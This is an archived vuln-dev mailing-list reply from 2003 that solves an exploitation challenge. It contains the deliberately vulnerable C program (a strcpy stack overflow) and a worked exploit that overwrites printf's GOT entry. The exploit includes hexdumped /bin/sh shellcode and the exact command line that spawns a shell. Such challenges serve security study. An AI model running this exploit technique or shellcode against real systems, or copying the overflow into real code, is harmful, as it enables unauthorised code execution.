Strategy was to overwrite printf pointer with shellcode address. 1) Overwrite pointer held in bfp with strcpy(buf, argv[1]). before: [buf][bfp][ret] after: [buf][&printf - 2][ret] Subtract 2 from printf addr to compensate for ";;%s;;" in fprintf 2) Overwrite printf function pointer with argv[2], fgets(bfp, BFSIZE, f1), f1 contains address of argv[1] or buf. 3) printf is then called which gives a shell. Note that a BUFSIZE of 90 actually allocates 92 bytes on the stack. /* vulndev2.c */ #include <stdio.h> #include <stdlib.h> #define BFSIZE 90 int main(int argc, char *argv[]) { char *bfp; char buf[BFSIZE]; FILE *f1; if (argc != 3) return 1; if ( (bfp = malloc(BFSIZE)) == NULL) return 1; /* debug */ printf("bfp = %p, buf = %p\n", bfp, buf); /* log input */ if ( (f1 = fopen("db.log", "a+")) == NULL) return 1; fprintf(f1, ";;%s;;", argv[2]); fclose(f1); strcpy(buf, argv[1]); /* read log */ if ( (f1 = fopen("db.log", "r")) == NULL) return 1; if (fgets(bfp, BFSIZE, f1) == NULL) return 1; printf("%s\n", bfp); fclose(f1); exit(1); } ## jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2 vd2: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049874 R_386_GLOB_DAT __gmon_start__ 08049848 R_386_JUMP_SLOT __register_frame_info 0804984c R_386_JUMP_SLOT fprintf 08049850 R_386_JUMP_SLOT malloc 08049854 R_386_JUMP_SLOT __deregister_frame_info 08049858 R_386_JUMP_SLOT fgets 0804985c R_386_JUMP_SLOT __libc_start_main 08049860 R_386_JUMP_SLOT printf 08049864 R_386_JUMP_SLOT fclose 08049868 R_386_JUMP_SLOT exit 0804986c R_386_JUMP_SLOT fopen 08049870 R_386_JUMP_SLOT strcpy jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell 00000000 31 db 31 c9 b0 46 cd 80 31 c0 50 68 2f 73 68 ff |1.1..F..1.Ph/sh.| 00000010 88 44 24 03 68 2f 62 69 6e 89 e3 50 53 89 e1 31 |.D$.h/bin..PS..1| 00000020 d2 b0 0b cd 80 |.....| 00000025 jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"` bfp = 0x8049898, buf = 0xbffffa6c sh-2.05a$ exit jroyes@tadpole:~/study/vuln-dev/cha2$ ## Thanks to sin for the tiny shellcode. On Fri, 2003-05-23 at 18:13, Dave McKinney wrote: > > We are announcing the second challenge. Initially, we wanted to have this > out a few days ago but were involved in testing it on multiple platforms. > This challenge is a little easier than the first one, since we'd like to > see more people attempting to produce a proof-of-concept. If you find it > too easy, you're welcome to attempt it in an environment with a > non-executable stack/heap to raise the bar a little. > > Here's a link to the basic guidelines (for those who missed it): > > http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0 > > (also, please retain the [Vuln-dev Challenge] string in the subject line > for replies to make for easier filtering for those not interested in > challenge related discussion.) > > --- > > /* vulndev2.c */ > > #include <stdio.h> > #include <stdlib.h> > > #define BFSIZE 90 > > int > main(int argc, char *argv[]) > { > char *bfp; > char buf[BFSIZE]; > FILE *f1; > > if (argc != 3) > return 1; > if ( (bfp = malloc(BFSIZE)) == NULL) > return 1; > > /* log input */ > if ( (f1 = fopen("db.log", "a+")) == NULL) > return 1; > fprintf(f1, ";;%s;;", argv[2]); > fclose(f1); > > strcpy(buf, argv[1]); > > /* read log */ > if ( (f1 = fopen("db.log", "r")) == NULL) > return 1; > if (fgets(bfp, BFSIZE, f1) == NULL) > return 1; > > printf("%s\n", bfp); > fclose(f1); > exit(1); > } > > --- > > Dave McKinney > Symantec > > keyID: BF919DD7 > key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7 -- Jason Royes Data Access Experts http://www.da-experts.com/
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 14:01:34 PDT